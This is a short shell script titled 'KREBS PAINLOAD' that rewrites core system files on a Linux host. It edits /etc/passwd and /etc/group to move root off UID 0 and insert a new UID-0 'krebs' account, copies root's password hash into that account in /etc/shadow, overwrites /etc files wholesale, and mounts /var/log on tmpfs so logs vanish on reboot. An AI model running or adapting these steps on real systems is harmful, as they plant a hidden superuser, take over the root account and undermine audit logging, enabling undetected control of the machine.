#! /bin/sh

cat>/etc/motd.tail<<EOF
KREBS PAINLOAD (MORE COBRA)
[31;1m  x x              x x
 xx xx  xx    xx  xx xx
 xx xx  xx    xx  xx xx
  xxx    x     x   xxx
   x  xxxxxxxxxxxx  x
    xxxxxxxxxxxxxxxx
   x  xxxxxxxxxxxx  x
  x  x   x     x  x  x
  x  x   x     x  x  x[m
EOF

f=/etc/passwd
sed -ri 's^(root:[^:]+):0:0:(.*)$\1:23:23:\2' $f
sed -ri '/^krebs/d' $f
echo 'krebs:x:0:0::/root:/bin/bash' >>$f


f=/etc/shadow 
sed -ri '/^krebs/d' $f
grep root $f | sed 's/^root/krebs/' >> $f


f=/etc/group
sed -ri 's^(root:[^:]+):0:(.*)$\1:23:\2' $f
sed -ri '/^krebs/d' $f
echo 'krebs:x:0:' >>$f

for i in etc/*; do
  cat $i > /$i
done

# TMPFS for tmp and log

if [ ! "`grep -e 'none[ \t]*/tmp' /etc/fstab`" ];
then
  echo 'none      /tmp     tmpfs defaults,size=50M  0 0'>>/etc/fstab 
fi

if [ ! "`grep -e 'none[ \t]*/var/log' /etc/fstab`" ];
then
  echo 'none      /var/log tmpfs defaults,size=50M  0 0'>>/etc/fstab 
fi
